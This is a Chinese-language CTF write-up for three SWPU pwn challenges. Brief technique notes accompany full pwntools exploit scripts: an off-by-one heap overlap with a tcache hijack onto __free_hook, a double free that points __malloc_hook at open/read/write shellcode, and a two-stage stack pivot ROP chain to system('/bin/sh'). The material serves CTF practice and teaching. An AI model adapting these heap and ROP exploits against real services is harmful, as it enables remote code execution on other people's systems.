过去的SWPU的题目搬出来做一下
tnote:
off by one堆重叠泄露堆地址
然后劫持到tcache struct(heap_base+0x10处修改counts)泄露libc,然后正常打free_hook
exp:
from pwn import *
# Session setup: verbose pwntools logging, x86-64 target, gdb in a tmux split.
context.update(log_level='debug', arch='amd64', terminal=['tmux', 'splitw', '-h'])
remote_host, remote_port = "node2.anna.nssctf.cn", 28240
io = remote(remote_host, remote_port)
# io = process("./service")
# Challenge binary and the libc it ships with; the libc.sym lookups below read this file.
elf = ELF("./service")
libc = ELF("./libc-2.27.so")
def add(s):
    """Menu option ``A``: answer the size prompt with *s*."""
    menu_prompt = b"choice: "
    io.sendlineafter(menu_prompt, b"A")
    io.sendlineafter(b"size?", str(s))
def edit(n, cc):
    """Menu option ``E``: select index *n* and send *cc* as the new content."""
    menu_prompt = b"choice: "
    io.sendlineafter(menu_prompt, b"E")
    io.sendlineafter(b"idx?", str(n))
    io.sendlineafter(b"content:", cc)
def show(n):
    """Menu option ``S``: ask the service to print index *n*."""
    menu_prompt = b"choice: "
    io.sendlineafter(menu_prompt, b"S")
    io.sendlineafter(b"idx?", str(n))
def delete(n):
    """Menu option ``D``: ask the service to delete index *n*."""
    menu_prompt = b"choice: "
    io.sendlineafter(menu_prompt, b"D")
    io.sendlineafter(b"idx?", str(n))
# gdb.attach(io)
# pause()
# Exploit sequence (tnote). Sizes, deltas and libc symbol offsets below are
# specific to this binary and its bundled libc-2.27; they do not transfer to
# another build and must be re-derived there.
add(0x18) #0
add(0x18) #1
add(0x78) #2
add(0x10) #3
edit(0,cyclic(0x18)+p64(0x61)) # 0x18 bytes of filler, then 0x61 written past the 0x18-byte chunk (the off-by-one from the note above)
delete(1)
delete(2)
# edit(0,cyclic(0x18)+p64(0x81))
add(0x50) #1 -- indices are reused: a freed slot is handed out again in delete order
edit(1,b"a"*0x27+b"b")
show(1)
io.recvuntil(b"b")
heap_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x10 # leak heap address: 6 bytes read back after the 'b' marker
print("heap_addr: "+hex(heap_addr))
edit(1,b"a"*0x18+p64(0x81)+p64(heap_addr+0x10)+p64(0)) # heap_addr+0x10 is the tcache struct the note above refers to
add(0x78) #2
add(0x78) #4
edit(4,b"\x07"*0x40+p64(0)*6+p64(heap_addr+0x10))
delete(4)
add(0x78) #4
show(4)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"] # leak libc base; the -0x70 delta is libc-build-specific
print("leak_addr: "+hex(leak_addr))
free_hook=leak_addr+libc.sym[b"__free_hook"]
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"] # not used further below
one_gadget=[0x4f3d5,0x4f432,0x10a41c] # offsets from the one_gadget listing after this script; valid only for this libc build, see its constraints
shell=leak_addr+one_gadget[1]
edit(4,b"\x02"*0x40+p64(0)*3+p64(free_hook))
add(0x40) #5
edit(5,p64(shell)) # hijack __free_hook to the chosen one_gadget
delete(5) #trigger: freeing this chunk makes the hijacked hook fire
io.interactive()
# 0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# rsp & 0xf == 0
# rcx == NULL
# 0x4f432 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# [rsp+0x40] == NULL
# 0x10a41c execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
p1KkHeap:
开启沙盒禁用execve()
mmap开辟rwx段
劫持hook到rwx段上地址打orw shellcode即可
同样需要打tcache struct,注意构造tcachebin的大小
exp:
from pwn import *
# Session setup: verbose pwntools logging, x86-64 target, gdb in a tmux split.
context.update(log_level='debug', arch='amd64', terminal=['tmux', 'splitw', '-h'])
remote_host, remote_port = "node1.anna.nssctf.cn", 28176
io = remote(remote_host, remote_port)
# io = process("./SWPUCTF_2019_p1KkHeap")
# Challenge binary and the libc it ships with; the libc.sym lookups below read this file.
elf = ELF("./SWPUCTF_2019_p1KkHeap")
libc = ELF("./libc-2.27.so")
def add(s):
    """Menu option ``1``: answer the size prompt with *s*."""
    menu_prompt = b"Choice: "
    io.sendlineafter(menu_prompt, b"1")
    io.sendlineafter(b"size: ", str(s))
def show(n):
    """Menu option ``2``: ask the service to print id *n*."""
    menu_prompt = b"Choice: "
    io.sendlineafter(menu_prompt, b"2")
    io.sendlineafter(b"id: ", str(n))
def edit(n, cc):
    """Menu option ``3``: select id *n* and send *cc* raw (no trailing newline)."""
    menu_prompt = b"Choice: "
    io.sendlineafter(menu_prompt, b"3")
    io.sendlineafter(b"id: ", str(n))
    # sendafter, not sendlineafter: the content must be sent without a newline.
    io.sendafter(b"content: ", cc)
def delete(n):
    """Menu option ``4``: ask the service to delete id *n*."""
    menu_prompt = b"Choice: "
    io.sendlineafter(menu_prompt, b"4")
    io.sendlineafter(b"id: ", str(n))
# gdb.attach(io)
# pause()
# Exploit sequence (p1KkHeap). Constants are specific to this binary and its
# bundled libc-2.27 and must be re-derived for any other build.
mm_addr=0x66660100 # start of the rwx mmap region the note above refers to (binary-specific)
add(0x100) #0
add(0x100) #1
delete(0)
delete(0) # id 0 is freed twice; the freed chunk is read back right after
show(0)
io.recvuntil(b"content: ")
heap_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x260 # leak heap base; the 0x260 delta is layout-specific
print("heap_addr: "+hex(heap_addr))
add(0x100) #2
edit(2,p64(heap_addr+0x10)) # heap_addr+0x10 is the tcache struct the note above refers to
add(0x100) #3
add(0x100) #4
edit(4,b"\x07"*0x40)
delete(0)
show(0)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"] # leak libc base; the -0x70 delta is libc-build-specific
print("leak_addr: "+hex(leak_addr))
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
# open/read/write of /flag into the rwx region: execve is blocked by the sandbox (note above).
orw_shellcode=asm(shellcraft.open("/flag")+shellcraft.read(3,mm_addr+0x400,0x50)+shellcraft.write(1,mm_addr+0x400,0x50))
edit(4,b"\x07"*0x40+p64(0)*6+p64(malloc_hook)+p64(0)+p64(mm_addr))
add(0x90) #5 -- per the note above this allocation is expected to land in the rwx region
edit(5,orw_shellcode)
add(0x70) #6 -- expected to be __malloc_hook after the write to 4 above
edit(6,p64(mm_addr)) # point the hook at the shellcode
add(0x30) # final allocation: the hijacked hook fires
io.interactive()
WheretoGo:
一次溢出的栈迁移模板题,不过因为环境问题最后得迁2次
exp:
from pwn import *
# Session setup: verbose pwntools logging, x86-64 target, gdb in a tmux split.
context.update(log_level='debug', arch='amd64', terminal=['tmux', 'splitw', '-h'])
remote_host, remote_port = "node2.anna.nssctf.cn", 28972
io = remote(remote_host, remote_port)
# io = process("./WheretoGo")
# Challenge binary and the libc it ships with; plt/got/sym lookups below read these files.
elf = ELF("./WheretoGo")
libc = ELF("./libc-2.31.so")
# Exploit sequence (WheretoGo): a stack pivot done twice, as the note above explains.
# Addresses are specific to this binary and its bundled libc-2.31.
puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]
bk_addr=0x4011bd # address inside the binary to return to after the leak (not in the gadget listing below)
bss_addr=0x404d00 # writable area in the binary used as the pivot target
read_text=0x4011C9 # address of the binary's read path (binary-specific)
leave_ret=0x4011e0 # 'leave ; ret' from the gadget listing below
pop_rdi=0x4012d3 # 'pop rdi ; ret' from the gadget listing below
io.recvuntil(b"go?\n")
# Stage 1: 0x80 bytes of filler, then what is presumably the saved rbp and the return address.
payload=cyclic(0x80)+p64(bss_addr)+p64(read_text)
payload=payload.ljust(0x100,b"a")
io.send(payload)
# Stage 2: leak puts@GOT through puts@PLT, then pivot into the bss frame via leave;ret.
payload=p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(bk_addr)
payload=payload.ljust(0x80,b"\x00")+p64(bss_addr-0x80)+p64(leave_ret)
payload=payload.ljust(0x100,b"a")
io.send(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"] # libc base from the leaked puts address
print("leak_addr: "+hex(leak_addr))
sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))
# Second pivot: the note above says the environment required migrating twice.
payload=cyclic(0x80)+p64(bss_addr-0x200-0x8)+p64(read_text)
payload=payload.ljust(0x100,b"a")
io.send(payload)
# gdb.attach(io)
# pause()
payload=p64(0)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
payload=payload.ljust(0x80,b"\x00")+p64(bss_addr-0x280-0x8)+p64(leave_ret)
payload=payload.ljust(0x100,b"a")
io.send(payload)
# payload=cyclic(0x88)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
# io.send(payload)
io.interactive()
# Gadgets information
# ============================================================
# 0x00000000004011e0 : leave ; ret
# 0x00000000004012cc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012ce : pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012d0 : pop r14 ; pop r15 ; ret
# 0x00000000004012d2 : pop r15 ; ret
# 0x00000000004012cb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012cf : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040115d : pop rbp ; ret
# 0x00000000004012d3 : pop rdi ; ret
# 0x00000000004012d1 : pop rsi ; pop r15 ; ret
# 0x00000000004012cd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret
# Unique gadgets found: 12